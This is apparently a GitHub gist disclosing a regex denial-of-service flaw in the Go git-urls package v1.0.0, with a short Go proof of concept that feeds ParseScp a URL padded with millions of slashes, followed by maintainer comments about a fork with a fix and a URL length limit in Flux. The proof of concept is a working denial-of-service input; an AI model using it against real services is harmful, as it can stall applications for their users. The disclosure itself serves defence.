Last active
December 5, 2023 17:12
-
-
Save 6en6ar/7c2424c93e7fbf2b6fc44e7fb9acb95d to your computer and use it in GitHub Desktop.
Security issue in regex inside git-urls package
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[NAME OF AFFECTED PRODUCT(S)] | |
- https://pkg.go.dev/github.com/whilp/git-urls v1.0.0 | |
[AFFECTED AND/OR FIXED VERSION(S)] | |
- v1.0.0 | |
- Status: not fixed | |
[VULNERABILITY] | |
- Regex Denial of Service | |
[DESCRIPTION] | |
The regex on line 35. inside urls.go is vulnerable to regex denial of service when a long input is provided inside | |
directory path of the git url. | |
It is possible to cause a 7s delay but only because the payload in the url was to long. Here is the PoC: | |
var payload = strings.Repeat("////", 19000000) //payload used, the number can be tweaked to cause 7 second delay | |
malicious_url := "6en6ar@-:0////" + payload + "\" | |
begin := time.Now() | |
//u, err := giturls.ParseScp("remote_username@10.10.0.2:/remote/directory")// normal git url | |
_, err := giturls.ParseScp(malicious_url) | |
if err != nil { | |
fmt.Errorf("[ - ] Error ->" + err.Error()) | |
} | |
//fmt.Println("[ + ] Url --> " + u.Host) | |
elapse := time.Since(begin) | |
fmt.Printf("Function took %s", elapse) | |
This vulnerbale regex causes the application to take longer time in parsing the input. |
Thanks for noticing. I updated the version in the description.
@makkes We've moved the repo to our organization and fixed the current issue. Please, check https://github.com/chainguard-dev/git-urls.
Thanks for the heads-up, @hectorj2f! Is the goal to keep maintaining the lib there or just as long as a fix version hasn't been released upstream?
As a side note, we fixed it in Flux by limiting the URL string we pass to git-urls to a 2048 bytes.
Yes, we'll keep maintaining our copy independently of what upstream repo does. It currently looks unmaintained for the moment.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
There is no version 1.0.1 of the git-urls library.